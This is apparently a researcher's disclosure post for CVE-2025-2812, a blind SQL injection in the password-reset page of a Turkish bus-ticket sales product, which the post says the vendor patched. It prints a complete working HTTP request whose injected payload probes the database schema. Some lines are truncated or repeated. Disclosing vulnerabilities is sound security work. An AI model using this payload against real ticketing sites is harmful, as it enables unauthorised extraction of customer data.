
CVE-2025-2812 SQL Injection
📌 CVE-ID: CVE-2025-2812
📢 USOM Announcement: tr-25-0099
🛡️ Vulnerability Type: CWE-89 - SQL Injection (Boolean-based Blind)
🏢 Affected Product: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 Example Target URL:https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
A Boolean-based Blind SQL Injection vulnerability has been identified in the "Bilet Satış Otomasyonu" product, specifically in the "First letter of your name" (ilkHarf) parameter on the password reset (SifremiUnuttum.php) page. This vulnerability allows data exfiltration from the system without a username or password.
This vulnerability covers the systems of the following bus companies:
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW
ilkHarfAfter the vulnerability we identified in the "Bilet Satış Otomasyonu" product developed by Mydata Bilişim Ltd. Şti, this vulnerability, announced under CVE-2025-2812, has been disclosed in coordination with the manufacturer and USOM. We are proud to contribute to the cybersecurity community in this process.
Following the notification of the vulnerability, Mydata Bilişim Ltd. Şti promptly implemented all necessary procedures, closed the relevant security vulnerability, and integrated additional security measures into their systems. We thank them for their transparency, cooperation, and sense of responsibility throughout the process.
We are proud to contribute to the cybersecurity community in this process.
You can contact me for any questions, feedback, or collaboration: